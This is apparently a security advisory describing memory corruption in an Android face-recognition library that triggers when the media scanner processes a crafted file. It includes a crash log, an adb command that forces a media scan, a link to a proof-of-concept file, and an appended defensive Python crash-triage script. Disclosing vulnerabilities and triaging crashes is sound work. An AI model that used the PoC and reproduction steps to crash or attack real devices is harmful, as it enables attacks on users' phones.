Source: https://code.google.com/p/google-security-research/issues/detail?id=616
The attached file causes memory corruption when it is scanned by the face recognition library in android.media.process:
F/libc( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG ( 3021): Revision: '10'
I/DEBUG ( 3021): ABI: 'arm64'
I/DEBUG ( 3021): pid: 4134, tid: 12161, name: syncThread  >>> android.process.media <<<
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG ( 3021):     x0   3333333333333330  x1   0000007f714b6800  x2   000000000000001f  x3   3333333333333330
I/DEBUG ( 3021):     x4   0000007f817fedb8  x5   0000007f7c1f4ea8  x6   0000007f7c1f4ec0  x7   0000007f7c109680
I/DEBUG ( 3021):     x8   304b333333333333  x9   3033330333000000  x10  3333333333333333  x11  0103304b33333333
I/DEBUG ( 3021):     x12  0000040033300311  x13  0300035033333333  x14  0300303333233333  x15  0000000000001484
I/DEBUG ( 3021):     x16  0000007f74bfe828  x17  0000007f8c086008  x18  0000007f8c13b830  x19  0000007f7c279a00
I/DEBUG ( 3021):     x20  0000000000000000  x21  0000007f7c1036a0  x22  0000007f817ff440  x23  0000007f7c279a10
I/DEBUG ( 3021):     x24  0000000032d231a0  x25  0000000000000065  x26  0000000032d28880  x27  0000000000000065
I/DEBUG ( 3021):     x28  0000000000000000  x29  0000007f817fecb0  x30  0000007f740be014
I/DEBUG ( 3021):     sp   0000007f817fecb0  pc   0000007f740cefdc  pstate 0000000080000000
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021):     #00 pc 0000000000065fdc  /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG ( 3021):     #01 pc 0000000000055010  /system/lib64/libfacerecognition.so (MCC_Process+160)
To reproduce, download the attached file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip
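A crash-triage sketch for logs like the one above, added here as an example and not part of the original report: it parses the register dump, flags registers dominated by one repeated non-zero byte (the 0x33 pattern in this log), and lists registers that sit just below the faulting address. The function names, the thresholds and the 56-bit address mask (an assumption that the top byte of a pointer is not reflected in the reported fault address) are illustrative choices.

```python
import re

# Excerpt of the crash log above: values from the report, whitespace-separated.
SAMPLE_LOG = """\
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG ( 3021): x0 3333333333333330 x1 0000007f714b6800 x2 000000000000001f x3 3333333333333330
I/DEBUG ( 3021): x8 304b333333333333 x9 3033330333000000 x10 3333333333333333 x11 0103304b33333333
I/DEBUG ( 3021): x28 0000000000000000 x29 0000007f817fecb0 x30 0000007f740be014
I/DEBUG ( 3021): sp 0000007f817fecb0 pc 0000007f740cefdc pstate 0000000080000000
"""

REG_RE = re.compile(r"\b(x\d{1,2}|sp|pc)\s+([0-9a-f]{16})\b")
FAULT_RE = re.compile(r"fault addr 0x([0-9a-f]+)")
ADDR_MASK = (1 << 56) - 1  # assumption: compare only the low 56 address bits

def parse_crash(log):
    """Return (fault_addr, {register: value}) from debuggerd-style log text."""
    fault = int(FAULT_RE.search(log).group(1), 16)
    regs = {name: int(val, 16) for name, val in REG_RE.findall(log)}
    return fault, regs

def dominant_byte(value):
    """Return (byte, count) for the most frequent byte of a 64-bit value."""
    data = value.to_bytes(8, "big")
    byte = max(set(data), key=data.count)
    return byte, data.count(byte)

def triage(log, max_offset=0x100, min_repeat=6):
    """Return (filled, near): registers made of one repeated non-zero byte,
    and registers lying at most max_offset below the fault address."""
    fault, regs = parse_crash(log)
    filled, near = {}, {}
    for name, value in regs.items():
        byte, count = dominant_byte(value)
        if byte != 0 and count >= min_repeat:
            filled[name] = byte
        delta = (fault - value) & ADDR_MASK  # offset from register to fault
        if delta <= max_offset:
            near[name] = delta
    return filled, near

if __name__ == "__main__":
    filled, near = triage(SAMPLE_LOG)
    print("pattern-filled:", {r: hex(b) for r, b in filled.items()})
    print("near fault addr:", {r: hex(d) for r, d in near.items()})
```

A register that appears in both results is a pointer-sized value built from the repeated byte that was then dereferenced at a small offset, which is worth recording when deduplicating crashes from media-scanner fuzzing or field reports.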